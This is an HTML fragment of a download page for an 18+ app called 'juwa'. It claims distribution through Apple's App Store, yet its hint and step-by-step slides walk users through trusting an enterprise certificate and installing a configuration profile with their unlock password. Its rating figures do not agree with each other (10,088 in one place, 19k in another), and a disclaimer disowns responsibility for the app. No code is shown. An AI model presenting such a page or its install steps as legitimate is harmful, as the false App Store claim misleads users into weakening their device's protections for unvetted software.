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  <meta name="twitter:title" content="juwa">
  <meta name="twitter:description" content="[JUWA] is a free application developed by the company's professional team. The App is currently distributed through the App Store authorized by Apple.">
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        				<a class="down" href="javascript:;">Free Install</a>
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        		<strong class="publicTitle">hint:</strong>
        		<p>After software download please go to ihone Settings - General Purpose -VPN and Device Management - Enterprise app- Trust Certificate</p>
        		<div class="appTip">
        			<div class="score">
					    <p align="center">10088Ratings</p>
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        				  <div align="center">4.9 </div>
        				<p align="center">★★★★★</p>
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					    <p align="center">age</p>
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        				  <div align="center">18+</div>
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					    <p align="center">Ranking</p>
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        			<p>Out Of 5</p>
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        			<p>19k ratings</p>
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        		<strong class="publicTitle">New function</strong>
        	<div class="appInfo">
        		<strong class="publicTitle">Message</strong>
        		<div class="box">
        					<p>Requires iOS 13.0 or later. Compatible with iPhone, iPad and iPod touch。</p>
        					<span>Age classification</span>
        					<p>© 2018 MobiFun Games Inc</p>
        					<span>Privacy Policy</span>
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			<p class="p2">This website only provides download and hosting, App content related matters are the responsibility of the developer, and have nothing to do with this website。</p>
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						     	<div class="pic"><img src="img/0df0c_0_600_411.jpg" alt=""></div>
						     	<div class="text">Installation boot<br>The first step allows you to open the configuration description file</div>
						     <div class="swiper-slide">
						     	<div class="pic"><img src="img/9179e_3_600_411.jpg" alt=""></div>
						     	<div class="text">Installation boot<br>Step 2 Click the Install button in the upper right corner</div>
						     <div class="swiper-slide">
						     	<div class="pic"><img src="img/d3c74_2_600_411.jpg" alt=""></div>
						     	<div class="text">Installation boot<br>Step 3 Enter the unlock password </div>
						     <div class="swiper-slide">
						     	<div class="pic"><img src="img/0665a_1_600_411.jpg" alt=""></div>
						     	<div class="text">Installation boot<br>Step 4 Click the Install button below </div>
					    <div class="swiper-pagination"></div>
				<div class="smallTip"><a href="#">What is a description file?</a></div>
		<div class="pupPic"><img src="img/5cbc4_5_1242_2007.png" alt=""></div>

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